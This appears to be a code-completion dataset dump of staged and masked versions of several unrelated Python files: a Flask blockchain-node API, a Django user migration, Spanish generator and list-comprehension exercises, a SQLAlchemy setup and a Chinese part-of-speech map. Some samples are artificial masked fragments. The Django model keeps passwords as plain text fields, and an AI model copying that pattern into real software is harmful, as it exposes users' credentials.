f.append(addr)\n resp = {'Added PNodes': s, 'Not added pnodes': f}\n return jsonify(resp), 200\n resp = {'Error': 'Input format error'}\n return jsonify(resp), 400\n\n\[email protected]('/pnodes/size', methods=['GET'])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\n\n\[email protected]('/nodes', methods=['GET'])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\n\[email protected]('/nodes/resolve', methods=['GET'])\ndef resolve_nodes():\n added_nodes = node.resolveNodes()\n if added_nodes:\n return jsonify(added_nodes), 200\n else:\n return '0 nodes added', 400\n\n\[email protected]('/chain/resolve', methods=['GET'])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print('Nothing')\n return jsonify(r), 400\n\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n mb = node.mine()\n resp = {'Mined_block': mb}\n return jsonify(resp), 200\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--port', default=node.DEFAULT_PORT, type=int,\n help='port to listen on')\n args = parser.parse_args()\n port = args.port\n node.port = port\n app.run(host='', port=port)\n",
"step-5": "#!/usr/bin/env python3\n\n# -*- coding: utf-8 -*-\n\n\nfrom flask import Flask, request, jsonify\nfrom app import Node\nfrom dbm2 import filemanager\n\nfm = filemanager()\nnode = Node(fm)\n\napp = Flask(__name__)\n\[email protected](\"/transactions/isfull\",methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\[email protected](\"/transactions/new\",methods=[\"POST\"])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(),transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\[email protected](\"/chain/last\",methods=[\"GET\"])\ndef last_block():\n return jsonify(node.getLastBlock()), 200\[email protected](\"/chain\",methods=[\"GET\"])\ndef get_chain():\n return jsonify(node.chain), 200\[email protected](\"/pnodes/register\",methods=[\"POST\"])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes)==list:\n if len(nodes)>10 and nodes!=[]:\n nodes = nodes[:10]\n s = [] #succeed\n f = [] #failed\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {\"Added PNodes\":s,\n \"Not added pnodes\":f}\n return jsonify(resp), 200\n resp = {\"Error\":\"Input format error\"}\n return jsonify(resp), 400\[email protected](\"/pnodes/size\",methods=[\"GET\"])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\[email protected](\"/nodes\",methods=[\"GET\"])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\[email protected](\"/nodes/resolve\",methods=[\"GET\"])\ndef resolve_nodes():\n added_nodes = node.resolveNodes()\n if added_nodes:\n return jsonify(added_nodes), 200\n else:\n return \"0 nodes added\",400\n\[email protected](\"/chain/resolve\",methods=[\"GET\"])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print(\"Nothing\")\n return jsonify(r), 400\[email protected](\"/mine\",methods=[\"GET\"])\ndef mine():\n mb = node.mine()\n resp = {\"Mined_block\":mb}\n return jsonify(resp), 200\nif __name__==\"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-p\",\"--port\",default=node.DEFAULT_PORT,type=int,help='port to listen on')\n args = parser.parse_args()\n port = args.port\n node.port=port\n app.run(host=\"\",port=port)\n \n",
"step-ids": [
8,
11,
12,
13,
14
]
}
|
[
8,
11,
12,
13,
14
] |
# Generated by Django 2.2.1 on 2019-06-01 09:56
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Participant',
fields=[
('username', models.CharField(max_length=25, primary_key=True, serialize=False)),
('phone_num', models.CharField(default='', max_length=16)),
('password', models.CharField(max_length=16)),
('register_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),
('last_login_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),
('heartbeat_smartwatch', models.BigIntegerField(blank=True, default=1559382976.184129)),
('heartbeat_smartphone', models.BigIntegerField(blank=True, default=1559382976.184129)),
],
),
]
|
normal
|
{
"blob_id": "58b12418a2a6b1ef9b63800b89e7f0b9fffd908c",
"index": 9223,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='Participant', fields=[(\n 'username', models.CharField(max_length=25, primary_key=True,\n serialize=False)), ('phone_num', models.CharField(default='',\n max_length=16)), ('password', models.CharField(max_length=16)), (\n 'register_datetime', models.BigIntegerField(blank=True, default=\n 1559382976.184129)), ('last_login_datetime', models.BigIntegerField\n (blank=True, default=1559382976.184129)), ('heartbeat_smartwatch',\n models.BigIntegerField(blank=True, default=1559382976.184129)), (\n 'heartbeat_smartphone', models.BigIntegerField(blank=True, default=\n 1559382976.184129))])]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='Participant', fields=[(\n 'username', models.CharField(max_length=25, primary_key=True,\n serialize=False)), ('phone_num', models.CharField(default='',\n max_length=16)), ('password', models.CharField(max_length=16)), (\n 'register_datetime', models.BigIntegerField(blank=True, default=\n 1559382976.184129)), ('last_login_datetime', models.BigIntegerField\n (blank=True, default=1559382976.184129)), ('heartbeat_smartwatch',\n models.BigIntegerField(blank=True, default=1559382976.184129)), (\n 'heartbeat_smartphone', models.BigIntegerField(blank=True, default=\n 1559382976.184129))])]\n",
"step-5": "# Generated by Django 2.2.1 on 2019-06-01 09:56\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Participant',\n fields=[\n ('username', models.CharField(max_length=25, primary_key=True, serialize=False)),\n ('phone_num', models.CharField(default='', max_length=16)),\n ('password', models.CharField(max_length=16)),\n ('register_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),\n ('last_login_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),\n ('heartbeat_smartwatch', models.BigIntegerField(blank=True, default=1559382976.184129)),\n ('heartbeat_smartphone', models.BigIntegerField(blank=True, default=1559382976.184129)),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def gprimo(nmax):
for x in range(1, nmax):
for i in range(2, x):
if x % i != 0:
continue
else:
break
else:
yield x
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gprimo(nmax):
for x in range(1, nmax):
for i in range(2, x):
if x % i != 0:
continue
else:
break
else:
yield x
<|reserved_special_token_0|>
def genBadaBoom(N):
if N > 0:
for i in range(1, N + 1):
if i % 3 == 0 and i % 5 == 0:
yield 'Bada Boom!!'
elif i % 3 == 0:
yield 'Bada'
elif i % 5 == 0:
yield 'Boom!!'
else:
yield i
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gprimo(nmax):
for x in range(1, nmax):
for i in range(2, x):
if x % i != 0:
continue
else:
break
else:
yield x
<|reserved_special_token_0|>
print(z)
<|reserved_special_token_0|>
def genBadaBoom(N):
if N > 0:
for i in range(1, N + 1):
if i % 3 == 0 and i % 5 == 0:
yield 'Bada Boom!!'
elif i % 3 == 0:
yield 'Bada'
elif i % 5 == 0:
yield 'Boom!!'
else:
yield i
<|reserved_special_token_0|>
print(z)
<|reserved_special_token_0|>
print(combinaciones)
print('El número de combinaciones es:', len(combinaciones))
<|reserved_special_token_0|>
print(combinacionesFedora)
print('Número de combinaciones que incluyen sombrero fedora:', len(
combinacionesFedora))
<|reserved_special_token_0|>
print(Y)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gprimo(nmax):
for x in range(1, nmax):
for i in range(2, x):
if x % i != 0:
continue
else:
break
else:
yield x
a = gprimo(10)
z = [e for e in a]
print(z)
<|reserved_special_token_0|>
def genBadaBoom(N):
if N > 0:
for i in range(1, N + 1):
if i % 3 == 0 and i % 5 == 0:
yield 'Bada Boom!!'
elif i % 3 == 0:
yield 'Bada'
elif i % 5 == 0:
yield 'Boom!!'
else:
yield i
a = genBadaBoom(10)
z = [e for e in a]
print(z)
<|reserved_special_token_0|>
camisas = ['roja', 'negra', 'azul', 'morada', 'cafe']
pantalones = ['negro', 'azul', 'cafe obscuro', 'crema']
accesorios = ['cinturon', 'tirantes', 'lentes', 'fedora']
combinaciones = [(x, y, z) for y in camisas for x in pantalones for z in
accesorios]
print(combinaciones)
print('El número de combinaciones es:', len(combinaciones))
<|reserved_special_token_0|>
combinacionesFedora = [(x, y, z) for x, y, z in combinaciones if z == 'fedora']
print(combinacionesFedora)
print('Número de combinaciones que incluyen sombrero fedora:', len(
combinacionesFedora))
<|reserved_special_token_0|>
cancion = """There's a hole in my heart, in my life, in my way
And it's filled with regret and all I did, to push you away
If there's still a place in your life, in your heart for me
I would do anything, so don't ask me to leave
I've got a hole in my soul where you use to be
You're the thorn in my heart and you're killing me
I wish I could go back and do it all differently
I wish that I'd treated you differently
'Cause now there's a hole in my soul where you use to be"""
cancion = list(cancion)
frecuenciaPalab = [cancion.count(w.casefold()) for w in cancion]
letra = filter(lambda a: cancion.count(a) == min(frecuenciaPalab), cancion)
Y = list(letra)
Y = dict.fromkeys(Y).keys()
print(Y)
<|reserved_special_token_1|>
"""
Primos <generadores> 30 pts
Realice una generador que devuelva de todos lo numeros primos
existentes de 0 hasta n-1 que cumpla con el siguiente prototipo:
def gprimo(N):
pass
a = gprimo(10)
z = [e for e in a]
print(z)
# [2, 3 ,5 ,7 ]
"""
def gprimo(nmax):
for x in range(1,nmax):
for i in range(2,x):
if x % i != 0:
#i no es divisor de x, x puede ser primo
continue
else:
#i es divisor de x, x no es primo
break
else:
#El bucle ha terminado con normalidad, el número que estabamos comprobando es primo
yield x
a = gprimo(10)
z =[e for e in a]
print(z)
"""
Bada Boom!!! <generadores> 20 pts
Defina un generador que reciba un numero entero positivo mayor a 0 N,
dicho generador proporciona numero de 1 hasta N
con las siguientes condiciones:
1) si es multiplo de 3 coloque la cadena "Bada"
2) si es multiplo de 5 coloque la cadena "Boom!!"
3) si es multiplo de 3 y 5 coloque "Bada Boom!!"
def genBadaBoom(N):
pass
a = genBadaBoom(10)
z = [e for e in a]
print(z)
#[1,2,"Bada",4,"Boom","Bada",7,8,"Bada","Boom"]
"""
def genBadaBoom(N):
if N > 0:
for i in range(1,N+1):
if(i % 3 == 0 and i % 5 == 0):
yield "Bada Boom!!"
elif(i % 3 == 0):
yield "Bada"
elif(i % 5 == 0):
yield "Boom!!"
else:
yield i
a = genBadaBoom(10)
z = [e for e in a]
print(z)
"""
Combinaciones <Comprensión de listas> 30pts
Una tienda de ropa quiere saber cuantos conjuntos se pueden crear
a partir de un grupo de 5 camisas (roja,negra,azul,morada y cafe),
4 pantalones (negro, azul, cafe obscuro y crema) y uno de 4 accesorios
posibles (cinturon, tirantes, lentes, fedora)
1) Obtenga una lista con todos los conjuntos posibles e imprimala en pantalla
2) imprima un mensaje donde mencione la cantidad de conjuntos posibles
"""
camisas = ["roja","negra","azul","morada","cafe"]
pantalones = ["negro", "azul", "cafe obscuro", "crema"]
accesorios = ["cinturon", "tirantes", "lentes", "fedora"]
combinaciones = [(x, y, z) for y in camisas for x in pantalones for z in accesorios]
print(combinaciones)
print("El número de combinaciones es:",len(combinaciones))
"""
¿Fedora? <Comprensión de listas > 15 pts
Del problema anterior imprima una lista que tenga todos los conjuntos
que incluyen un sombrero fedora y tambien despliegue su longitud
"""
combinacionesFedora = [(x, y, z) for (x,y,z) in combinaciones if z == 'fedora']
print(combinacionesFedora)
print("Número de combinaciones que incluyen sombrero fedora:",len(combinacionesFedora))
"""
<Monads> 30 pts
--Lacrimosa - Durch Nacht und Flut --
Die Suche endet jetzt und hier
Gestein kalt und nass
Granit in Deiner Brust
Der Stein der Dich zerdrückt
Der Fels der Dich umgibt
Aus dem gehauen Du doch bist
Despiertate te busco
Mi corazon abreté te libro
Elevate mi luz y prende mi llama
Si a ti, yo se, te encontrare
El fragmento anterior es un canción del duo lacrimosa
Usando Monads obtenga la letra
que menos se repite por cada linea y obtenga la probabilidad de sacar dicha
letra.
Nota: Pueden ayudarse de funciones recursivas y compresiones de lista.
"""
"""
<Monads>
--Hole in my soul apocalyptica-- 20 pts
El fragmento anterior es un canción del grupo apocalyptica
Usando Monads obtenga la letra
que menos se repite de todo el fragmento y obtenga la probabilidad de sacar dicha
letra.
Nota: Pueden ayudarse de funciones recursivas y compresiones de lista.
"""
cancion = """There's a hole in my heart, in my life, in my way
And it's filled with regret and all I did, to push you away
If there's still a place in your life, in your heart for me
I would do anything, so don't ask me to leave
I've got a hole in my soul where you use to be
You're the thorn in my heart and you're killing me
I wish I could go back and do it all differently
I wish that I'd treated you differently
'Cause now there's a hole in my soul where you use to be"""
cancion = list(cancion)#Lo hacemos una lista
frecuenciaPalab = [cancion.count(w.casefold()) for w in cancion] #contamos la frecuencia de cada letra sin importarnos si la letra se repite
letra = filter(lambda a: cancion.count(a) == min(frecuenciaPalab),cancion) #aplicamos un filtro a esa lista que nos devuela las letras que coinciden con el numero minimo en la frecuencia de letras que ya habiamos calculado
Y = list(letra)#Lo hacemos lista
Y = dict.fromkeys(Y).keys()#Para evitar valores duplicados que en un diccionario no se pueden duplicar los valores
print(Y)
|
flexible
|
{
"blob_id": "732886306d949c4059b08e1bc46de3ad95ba56cb",
"index": 1685,
"step-1": "<mask token>\n\n\ndef gprimo(nmax):\n for x in range(1, nmax):\n for i in range(2, x):\n if x % i != 0:\n continue\n else:\n break\n else:\n yield x\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef gprimo(nmax):\n for x in range(1, nmax):\n for i in range(2, x):\n if x % i != 0:\n continue\n else:\n break\n else:\n yield x\n\n\n<mask token>\n\n\ndef genBadaBoom(N):\n if N > 0:\n for i in range(1, N + 1):\n if i % 3 == 0 and i % 5 == 0:\n yield 'Bada Boom!!'\n elif i % 3 == 0:\n yield 'Bada'\n elif i % 5 == 0:\n yield 'Boom!!'\n else:\n yield i\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef gprimo(nmax):\n for x in range(1, nmax):\n for i in range(2, x):\n if x % i != 0:\n continue\n else:\n break\n else:\n yield x\n\n\n<mask token>\nprint(z)\n<mask token>\n\n\ndef genBadaBoom(N):\n if N > 0:\n for i in range(1, N + 1):\n if i % 3 == 0 and i % 5 == 0:\n yield 'Bada Boom!!'\n elif i % 3 == 0:\n yield 'Bada'\n elif i % 5 == 0:\n yield 'Boom!!'\n else:\n yield i\n\n\n<mask token>\nprint(z)\n<mask token>\nprint(combinaciones)\nprint('El número de combinaciones es:', len(combinaciones))\n<mask token>\nprint(combinacionesFedora)\nprint('Número de combinaciones que incluyen sombrero fedora:', len(\n combinacionesFedora))\n<mask token>\nprint(Y)\n",
"step-4": "<mask token>\n\n\ndef gprimo(nmax):\n for x in range(1, nmax):\n for i in range(2, x):\n if x % i != 0:\n continue\n else:\n break\n else:\n yield x\n\n\na = gprimo(10)\nz = [e for e in a]\nprint(z)\n<mask token>\n\n\ndef genBadaBoom(N):\n if N > 0:\n for i in range(1, N + 1):\n if i % 3 == 0 and i % 5 == 0:\n yield 'Bada Boom!!'\n elif i % 3 == 0:\n yield 'Bada'\n elif i % 5 == 0:\n yield 'Boom!!'\n else:\n yield i\n\n\na = genBadaBoom(10)\nz = [e for e in a]\nprint(z)\n<mask token>\ncamisas = ['roja', 'negra', 'azul', 'morada', 'cafe']\npantalones = ['negro', 'azul', 'cafe obscuro', 'crema']\naccesorios = ['cinturon', 'tirantes', 'lentes', 'fedora']\ncombinaciones = [(x, y, z) for y in camisas for x in pantalones for z in\n accesorios]\nprint(combinaciones)\nprint('El número de combinaciones es:', len(combinaciones))\n<mask token>\ncombinacionesFedora = [(x, y, z) for x, y, z in combinaciones if z == 'fedora']\nprint(combinacionesFedora)\nprint('Número de combinaciones que incluyen sombrero fedora:', len(\n combinacionesFedora))\n<mask token>\ncancion = \"\"\"There's a hole in my heart, in my life, in my way\nAnd it's filled with regret and all I did, to push you away\nIf there's still a place in your life, in your heart for me\nI would do anything, so don't ask me to leave\n\nI've got a hole in my soul where you use to be\nYou're the thorn in my heart and you're killing me\nI wish I could go back and do it all differently\nI wish that I'd treated you differently\n'Cause now there's a hole in my soul where you use to be\"\"\"\ncancion = list(cancion)\nfrecuenciaPalab = [cancion.count(w.casefold()) for w in cancion]\nletra = filter(lambda a: cancion.count(a) == min(frecuenciaPalab), cancion)\nY = list(letra)\nY = dict.fromkeys(Y).keys()\nprint(Y)\n",
"step-5": "\"\"\"\n\n Primos <generadores> 30 pts\n\n\tRealice una generador que devuelva de todos lo numeros primos\n\texistentes de 0 hasta n-1 que cumpla con el siguiente prototipo:\n\t\n\tdef gprimo(N):\n\t\tpass\n\t\n\t\n\ta = gprimo(10)\n\tz = [e for e in a]\n\tprint(z)\n\t# [2, 3 ,5 ,7 ]\n\"\"\"\n\ndef gprimo(nmax):\n\tfor x in range(1,nmax):\n\t\tfor i in range(2,x):\n\t\t\tif x % i != 0:\n\t\t\t\t#i no es divisor de x, x puede ser primo\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\t#i es divisor de x, x no es primo\n\t\t\t\tbreak\n\t\telse:\n\t\t\t#El bucle ha terminado con normalidad, el número que estabamos comprobando es primo\n\t\t\tyield x\n\na = gprimo(10)\nz =[e for e in a]\nprint(z)\n\n\n\"\"\"\nBada Boom!!! <generadores> 20 pts\n\t\n\tDefina un generador que reciba un numero entero positivo mayor a 0 N,\n\tdicho generador proporciona numero de 1 hasta N\n\tcon las siguientes condiciones:\n\t\t1) si es multiplo de 3 coloque la cadena \"Bada\"\n\t\t2) si es multiplo de 5 coloque la cadena \"Boom!!\"\n\t\t3) si es multiplo de 3 y 5 coloque \"Bada Boom!!\"\n\t\t\n\tdef genBadaBoom(N):\n\t\tpass\n\t\t\n\ta = genBadaBoom(10)\n\tz = [e for e in a]\n\tprint(z)\n\t#[1,2,\"Bada\",4,\"Boom\",\"Bada\",7,8,\"Bada\",\"Boom\"]\n\"\"\"\ndef genBadaBoom(N):\n\tif N > 0:\n\t\tfor i in range(1,N+1):\n\t\t\tif(i % 3 == 0 and i % 5 == 0):\n\t\t\t\tyield \"Bada Boom!!\"\n\t\t\telif(i % 3 == 0):\n\t\t\t\tyield \"Bada\"\n\t\t\telif(i % 5 == 0):\n\t\t\t\tyield \"Boom!!\"\n\t\t\telse:\n\t\t\t\tyield i\n\t\t\t\na = genBadaBoom(10)\nz = [e for e in a]\nprint(z)\n\n\"\"\"\n\n\nCombinaciones <Comprensión de listas> 30pts\n\n\tUna tienda de ropa quiere saber cuantos conjuntos se pueden crear \n\ta partir de un grupo de 5 camisas (roja,negra,azul,morada y cafe), \n\t4 pantalones (negro, azul, cafe obscuro y crema) y uno de 4 accesorios\n\tposibles (cinturon, tirantes, lentes, fedora)\n\t\n\t1) Obtenga una lista con todos los conjuntos posibles e imprimala en pantalla\n\t2) imprima un mensaje donde mencione la cantidad de conjuntos posibles\n\t\n\"\"\"\n\ncamisas = [\"roja\",\"negra\",\"azul\",\"morada\",\"cafe\"]\npantalones = [\"negro\", \"azul\", \"cafe obscuro\", \"crema\"]\naccesorios = [\"cinturon\", \"tirantes\", \"lentes\", \"fedora\"]\ncombinaciones = [(x, y, z) for y in camisas for x in pantalones for z in accesorios]\nprint(combinaciones)\nprint(\"El número de combinaciones es:\",len(combinaciones))\n\"\"\"\n \n¿Fedora? <Comprensión de listas > 15 pts\n\n\tDel problema anterior imprima una lista que tenga todos los conjuntos\n\tque incluyen un sombrero fedora y tambien despliegue su longitud\n\t\n\t\n\"\"\"\ncombinacionesFedora = [(x, y, z) for (x,y,z) in combinaciones if z == 'fedora']\nprint(combinacionesFedora)\nprint(\"Número de combinaciones que incluyen sombrero fedora:\",len(combinacionesFedora))\n\"\"\"\n<Monads> 30 pts\n\n--Lacrimosa - Durch Nacht und Flut -- \n\nDie Suche endet jetzt und hier\nGestein kalt und nass\nGranit in Deiner Brust\nDer Stein der Dich zerdrückt\nDer Fels der Dich umgibt\nAus dem gehauen Du doch bist\n\nDespiertate te busco\nMi corazon abreté te libro\nElevate mi luz y prende mi llama\nSi a ti, yo se, te encontrare\n\nEl fragmento anterior es un canción del duo lacrimosa\n\nUsando Monads obtenga la letra \nque menos se repite por cada linea y obtenga la probabilidad de sacar dicha\nletra.\n\nNota: Pueden ayudarse de funciones recursivas y compresiones de lista. \n\n\"\"\"\n\n\n\"\"\"\n<Monads>\n\n--Hole in my soul apocalyptica-- 20 pts\n\n\n\nEl fragmento anterior es un canción del grupo apocalyptica\n\nUsando Monads obtenga la letra \nque menos se repite de todo el fragmento y obtenga la probabilidad de sacar dicha\nletra.\n\nNota: Pueden ayudarse de funciones recursivas y compresiones de lista. \n\n\"\"\"\ncancion = \"\"\"There's a hole in my heart, in my life, in my way\nAnd it's filled with regret and all I did, to push you away\nIf there's still a place in your life, in your heart for me\nI would do anything, so don't ask me to leave\n\nI've got a hole in my soul where you use to be\nYou're the thorn in my heart and you're killing me\nI wish I could go back and do it all differently\nI wish that I'd treated you differently\n'Cause now there's a hole in my soul where you use to be\"\"\"\ncancion = list(cancion)#Lo hacemos una lista\nfrecuenciaPalab = [cancion.count(w.casefold()) for w in cancion] #contamos la frecuencia de cada letra sin importarnos si la letra se repite\nletra = filter(lambda a: cancion.count(a) == min(frecuenciaPalab),cancion) #aplicamos un filtro a esa lista que nos devuela las letras que coinciden con el numero minimo en la frecuencia de letras que ya habiamos calculado\nY = list(letra)#Lo hacemos lista\nY = dict.fromkeys(Y).keys()#Para evitar valores duplicados que en un diccionario no se pueden duplicar los valores\nprint(Y)\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from app import config
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
engine = create_engine(config.DB_URI)
Session = scoped_session(sessionmaker(bind=engine))
|
normal
|
{
"blob_id": "86c1aee21639958f707f99bc2468e952ad6c1859",
"index": 9352,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nengine = create_engine(config.DB_URI)\nSession = scoped_session(sessionmaker(bind=engine))\n",
"step-3": "from app import config\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nengine = create_engine(config.DB_URI)\nSession = scoped_session(sessionmaker(bind=engine))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):
"""Gets the part of speech name for *code*.
:param str code: The part of speech code to lookup, e.g. ``'nsf'``.
:param str name: Which part of speech name to include in the output. Must
be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.
Defaults to ``'parent'``. ``'parent'`` indicates that only the most
generic name should be used, e.g. ``'noun'`` for ``'nsf'``.
``'child'`` indicates that the most specific name should be used, e.g.
``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all
names should be used, e.g. ``('noun', 'toponym',
'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the
part of speech code is not transformed at all.
:param bool english: Whether to return an English or Chinese name.
:param dict pos_tags: Custom part of speech tags to use.
:returns: ``str`` if *name* is ``'parent'`` or ``'child'``.
``tuple`` if *name* is ``'all'``.
"""
return _get_pos_name(code, name, english, pos_tags)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):
"""Gets the part of speech name for *pos_code*."""
if names not in ('parent', 'child', 'all', 'raw'):
raise ValueError(
"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'"
.format(names))
logger.debug("Getting {0} POS name for '{1}' formatted as '{2}'.".
format('English' if english else 'Chinese', pos_code, names))
if names == 'raw':
return pos_code
pos_code = pos_code.lower()
for i in range(1, len(pos_code) + 1):
try:
pos_key = pos_code[0:i]
pos_entry = pos_map[pos_key]
break
except KeyError:
if i == len(pos_code):
logger.warning("part of speech not recognized: '{0}'".
format(pos_code))
return None
pos = pos_entry[1 if english else 0],
if names == 'parent':
logger.debug("Part of speech name found: '{0}'".format(pos[0]))
return pos[0]
if len(pos_entry) == 3 and pos_key != pos_code:
sub_map = pos_entry[2]
logger.debug(
"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'"
.format(pos_entry[1], pos_code))
sub_pos = _get_pos_name(pos_code, names, english, sub_map)
if names == 'all':
pos = pos + sub_pos if sub_pos else pos
else:
pos = sub_pos,
name = pos if names == 'all' else pos[-1]
logger.debug("Part of speech name found: '{0}'".format(name))
return name
def get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):
"""Gets the part of speech name for *code*.
:param str code: The part of speech code to lookup, e.g. ``'nsf'``.
:param str name: Which part of speech name to include in the output. Must
be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.
Defaults to ``'parent'``. ``'parent'`` indicates that only the most
generic name should be used, e.g. ``'noun'`` for ``'nsf'``.
``'child'`` indicates that the most specific name should be used, e.g.
``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all
names should be used, e.g. ``('noun', 'toponym',
'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the
part of speech code is not transformed at all.
:param bool english: Whether to return an English or Chinese name.
:param dict pos_tags: Custom part of speech tags to use.
:returns: ``str`` if *name* is ``'parent'`` or ``'child'``.
``tuple`` if *name* is ``'all'``.
"""
return _get_pos_name(code, name, english, pos_tags)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logger = logging.getLogger('pynlpir.pos_map')
POS_MAP = {'n': ('名词', 'noun', {'nr': ('人名', 'personal name', {'nr1': (
'汉语姓氏', 'Chinese surname'), 'nr2': ('汉语名字', 'Chinese given name'),
'nrj': ('日语人名', 'Japanese personal name'), 'nrf': ('音译人名',
'transcribed personal name')}), 'ns': ('地名', 'toponym', {'nsf': ('音译地名',
'transcribed toponym')}), 'nt': ('机构团体名', 'organization/group name'),
'nz': ('其它专名', 'other proper noun'), 'nl': ('名词性惯用语', 'noun phrase'),
'ng': ('名词性语素', 'noun morpheme')}), 't': ('时间词', 'time word', {'tg': (
'时间词性语素', 'time morpheme')}), 's': ('处所词', 'locative word'), 'f': (
'方位词', 'noun of locality'), 'v': ('动词', 'verb', {'vd': ('副动词',
'auxiliary verb'), 'vn': ('名动词', 'noun-verb'), 'vshi': ('动词"是"',
'verb 是'), 'vyou': ('动词"有"', 'verb 有'), 'vf': ('趋向动词',
'directional verb'), 'vx': ('行事动词', 'performative verb'), 'vi': (
'不及物动词', 'intransitive verb'), 'vl': ('动词性惯用语', 'verb phrase'), 'vg': (
'动词性语素', 'verb morpheme')}), 'a': ('形容词', 'adjective', {'ad': ('副形词',
'auxiliary adjective'), 'an': ('名形词', 'noun-adjective'), 'ag': (
'形容词性语素', 'adjective morpheme'), 'al': ('形容词性惯用语', 'adjective phrase')}
), 'b': ('区别词', 'distinguishing word', {'bl': ('区别词性惯用语',
'distinguishing phrase')}), 'z': ('状态词', 'status word'), 'r': ('代词',
'pronoun', {'rr': ('人称代词', 'personal pronoun'), 'rz': ('指示代词',
'demonstrative pronoun', {'rzt': ('时间指示代词',
'temporal demonstrative pronoun'), 'rzs': ('处所指示代词',
'locative demonstrative pronoun'), 'rzv': ('谓词性指示代词',
'predicate demonstrative pronoun')}), 'ry': ('疑问代词',
'interrogative pronoun', {'ryt': ('时间疑问代词',
'temporal interrogative pronoun'), 'rys': ('处所疑问代词',
'locative interrogative pronoun'), 'ryv': ('谓词性疑问代词',
'predicate interrogative pronoun')}), 'rg': ('代词性语素',
'pronoun morpheme')}), 'm': ('数词', 'numeral', {'mq': ('数量词',
'numeral-plus-classifier compound'), 'mg': ('干支', 'zodiac')}), 'q': (
'量词', 'classifier', {'qv': ('动量词', 'verbal classifier'), 'qt': ('时量词',
'temporal classifier')}), 'd': ('副词', 'adverb'), 'p': ('介词',
'preposition', {'pba': ('介词“把”', 'preposition 把'), 'pbei': ('介词“被”',
'preposition 被')}), 'c': ('连词', 'conjunction', {'cc': ('并列连词',
'coordinating conjunction')}), 'u': ('助词', 'particle', {'uzhe': ('着',
'particle 着'), 'ule': ('了/喽', 'particle 了/喽'), 'uguo': ('过',
'particle 过'), 'ude1': ('的/底', 'particle 的/底'), 'ude2': ('地',
'particle 地'), 'ude3': ('得', 'particle 得'), 'usuo': ('所', 'particle 所'),
'udeng': ('等/等等/云云', 'particle 等/等等/云云'), 'uyy': ('一样/一般/似的/般',
'particle 一样/一般/似的/般'), 'udh': ('的话', 'particle 的话'), 'uls': (
'来讲/来说/而言/说来', 'particle 来讲/来说/而言/说来'), 'uzhi': ('之', 'particle 之'),
'ulian': ('连', 'particle 连')}), 'e': ('叹词', 'interjection'), 'y': (
'语气词', 'modal particle'), 'o': ('拟声词', 'onomatopoeia'), 'h': ('前缀',
'prefix'), 'k': ('后缀', 'suffix'), 'x': ('字符串', 'string', {'xe': (
'Email字符串', 'email address'), 'xs': ('微博会话分隔符', 'hashtag'), 'xm': (
'表情符合', 'emoticon'), 'xu': ('网址URL', 'URL'), 'xx': ('非语素字',
'non-morpheme character')}), 'w': ('标点符号', 'punctuation mark', {'wkz':
('左括号', 'left parenthesis/bracket'), 'wky': ('右括号',
'right parenthesis/bracket'), 'wyz': ('左引号', 'left quotation mark'),
